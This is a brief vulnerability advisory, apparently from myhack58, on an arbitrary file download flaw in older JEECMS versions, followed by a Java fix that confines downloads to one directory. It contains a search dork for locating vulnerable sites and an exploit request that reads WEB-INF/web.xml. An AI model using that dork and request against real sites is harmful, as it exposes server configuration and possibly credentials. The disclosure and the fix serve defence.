JEECMS arbitrary file download leading to sensitive information disclosure - vulnerability warning - myhack58

2014-12-29T00:00:00
ID MYHACK58:62201457467
Type myhack58
Reporter Anonymous (佚名)
Modified 2014-12-29T00:00:00

Description

Appears to affect older JEECMS versions.

inurl:download.jspx?path=

Arbitrary file download

download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml


Proof of vulnerability: the request above returned WEB-INF/web.xml on multiple live JEECMS sites.


Fix:

Validate and filter the file path parameters (fpath and filename) before serving a file.
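A path-containment check of the kind this fix calls for, as an added example that is not JEECMS's own code. It assumes a hypothetical download directory under the web root and the two request parameters named above (fpath, filename); any file that resolves outside that directory, including WEB-INF, is refused.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

/** Hardened download resolver (added example, not JEECMS code). */
public final class SafeDownload {

    private final Path downloadRoot;

    /** webRoot/downloadDir is the only directory files may be served from. */
    public SafeDownload(Path webRoot, String downloadDir) throws IOException {
        // Canonicalise once so later comparisons are on real paths.
        this.downloadRoot = webRoot.resolve(downloadDir).toRealPath();
    }

    /** Returns the file to serve, or null if the request must be rejected. */
    public Path resolve(String fpath) throws IOException {
        if (fpath == null || fpath.isEmpty() || fpath.indexOf('\0') >= 0) {
            return null;
        }
        // Collapse "." and ".." segments; an absolute fpath replaces the
        // root entirely and therefore fails the startsWith check below.
        Path requested = downloadRoot.resolve(fpath).normalize();
        if (!requested.startsWith(downloadRoot)) {
            return null;            // e.g. "../WEB-INF/web.xml"
        }
        if (!Files.isRegularFile(requested)) {
            return null;            // directories and missing files
        }
        // Follow symlinks and re-check: a link inside the download
        // directory must not point at WEB-INF or anywhere else outside it.
        Path real = requested.toRealPath();
        return real.startsWith(downloadRoot) ? real : null;
    }

    /** Reduce the user-supplied "filename" parameter to a bare file name
     *  safe for a Content-Disposition header (no path, no CR/LF, no quotes). */
    public static String safeFilename(String filename, String fallback) {
        if (filename == null || filename.isEmpty()) return fallback;
        Path name = Paths.get(filename).getFileName();
        if (name == null || name.toString().isEmpty()) return fallback;
        return name.toString().replaceAll("[\\r\\n\"]", "_");
    }
}
```

With this in place the original request "fpath=WEB-INF/web.xml" resolves to a non-existent file under the download directory and "fpath=../WEB-INF/web.xml" fails the containment check, so both return null rather than the deployment descriptor.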